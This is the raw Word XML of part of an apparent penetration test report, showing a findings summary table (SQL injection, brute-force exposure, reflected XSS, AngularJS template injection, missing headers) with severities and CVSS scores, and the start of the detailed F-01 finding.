      <w:tr w:rsidR="00514271" w14:paraId="3EA93153" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1F2937"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="406B3024" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1F2937"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B22ACBE" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1F2937"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2C49EE42" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2100" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1F2937"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2B462FEC" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00514271" w14:paraId="6725DF9F" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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7BD606A7" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>F-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="42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5CCA3C23" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SQL Injection — catalog category parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="7F1D1D"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5571F423" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="21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0FAFD25C" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00514271" w14:paraId="038C3F10" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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3300CC8D" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>F-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="42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40B40561" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>No Rate Limiting on Login (Brute Force)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="B91C1C"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="553F3101" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="21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7447DA3D" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>7.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00514271" w14:paraId="11AEED34" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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365C07AE" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>F-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="42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039F60E7" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Reflected XSS — Blog Search</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="B45309"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1455245C" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="21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216097DE" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>5.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00514271" w14:paraId="184A46F7" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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7ECE974A" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>F-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="42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568EE2F3" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Client-Side Template Injection (outdated AngularJS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="B91C1C"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="42A561DD" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="21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5DA8301A" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>7.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00514271" w14:paraId="4DE2664C" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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74912C52" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>F-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="42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005E47A5" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Reflected XSS — Catalog </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>searchTerm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="B45309"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3BEF302D" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="21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621800C5" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>6.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00514271" w14:paraId="7D295FC2" w14:textId="77777777" w:rsidTr="00A569E6">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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017B5E8F" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>F-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="42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74E74B78" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Reflected XSS — Login parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="B45309"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="68472B49" w14:textId="317634D4" w:rsidR="00514271" w:rsidRDefault="00F50484">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="21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0D547C18" w14:textId="0C09132C" w:rsidR="00514271" w:rsidRDefault="00A569E6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>5.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00514271" w14:paraId="5108091F" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10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374B9AC6" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>F-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="42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6A7D7D29" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Missing Security Headers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="374151"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B3788ED" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2100" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4C8CCFAD" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C52CBF8" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F67BD8A" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="8" w:space="4" w:color="1F2937"/>
        </w:pBdr>
        <w:spacing w:before="400" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6. Detailed Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DF25CE" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:before="500" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>F-01: SQL Injection in Catalog Category Parameter</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="2200" w:type="dxa"/>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514271" w14:paraId="650533AB" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="7F1D1D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="60BA4566" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="139C0A41" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00514271">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>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7446"/>
      </w:tblGrid>
      <w:tr w:rsidR="00514271" w14:paraId="04B2498D"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64421F00" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS 3.1 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Score</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>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57AC3677" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.8 (</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>AV:N</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00514271" w14:paraId="7CB2136B"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46BC634A" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE</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4439E925" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
